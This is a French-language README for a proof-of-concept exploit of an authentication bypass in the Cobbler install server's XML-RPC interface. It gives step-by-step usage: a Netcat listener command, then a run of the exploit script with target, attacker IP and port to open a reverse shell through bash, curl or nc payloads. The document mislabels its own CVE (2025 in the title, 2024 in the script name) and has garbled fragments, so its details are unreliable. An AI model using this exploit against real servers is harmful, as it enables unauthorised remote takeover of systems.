
Preuve de concept (PoC) de CVE-2025-47533 Clobber RCE
Cobbler, un serveur d'installation Linux qui permet la mise en place rapide d'environnements d'installation réseau, présente une vulnérabilité d'authentification dans les versions 3.0.0 jusqu'à (mais sans inclure) 3.2.3 et 3.3.7. La fonction utils.get_shared_secret() renvoie toujours -1, ce qui permet à quiconque de se connecter à l'interface XML-RPC de Cobbler avec un nom d'utilisateur vide ('') et un mot de passe -1. Cela permet à un attaquant disposant d'un accès réseau d'obtenir un contrôle total du serveur Cobbler. La vulnérabilité est corrigée dans les versions 3.2.3 et 3.3.7.
La vulnérabilité est causée par une gestion inappropriée du secret partagé dans la fonction utils.get_shared_secret(), qui renvoie toujours -1, contournant ainsi l'authentification. Cela permet à tout utilisateur réseau de se connecter à l'interface XMLRPC de Cobbler avec des identifiants vides et d'exécuter des commandes arbitraires.
http://<target>:25151/ — point de terminaison de l'API XMLRPC de Cobbler
Le script d'exploitation prend en charge divers payloads de shell inversé, notamment :
nc)Démarrez un écouteur Netcat sur votre machine :
nc -lvnp 4444
Exécutez le script d'exploitation CVE-2024-47533.py.
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
-t : Target (Example: -t http://1<IP_SERVICE>:<PORT>)
-l: Local IP (Example: -l 10.10.11.80)
-p : Port <LOCAL_PORT> (Example: -p 4444)
--payload: Payload(bash, curl, nc) (Example: --payload bash)
En cas d'exécution réussie, le shell inversé se connectera en retour à l'écouteur, offrant à l'attaquant un accès distant au serveur.